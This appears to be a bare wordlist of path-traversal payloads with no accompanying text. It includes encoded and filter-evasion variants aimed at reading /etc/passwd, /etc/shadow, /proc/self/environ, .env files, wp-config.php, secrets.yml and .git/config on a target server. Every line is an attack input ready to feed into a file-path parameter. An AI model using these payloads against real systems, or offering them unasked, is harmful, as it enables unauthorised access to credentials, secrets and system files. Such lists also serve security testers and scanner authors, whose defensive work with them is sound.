../../../etc/passwd
../../etc/passwd
../../../../etc/passwd
../../../../../../../etc/passwd
..\..\..\..\windows\win.ini
..\..\..\..\windows\system32\drivers\etc\hosts
../../../boot.ini
....//....//....//etc/passwd
..%252f..%252f..%252fetc%252fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
file:///etc/passwd
/proc/self/environ
/proc/version
/proc/cpuinfo
../../../../../../../etc/shadow
../../../../../../../etc/hosts
../../../config.php
../../../wp-config.php
../../../database.yml
../../../secrets.yml
../../../.env
../../../.git/config
../../../.htaccess
../../../web.config
..\\..\\..\\windows\\win.ini
..\\..\\..\\boot.ini
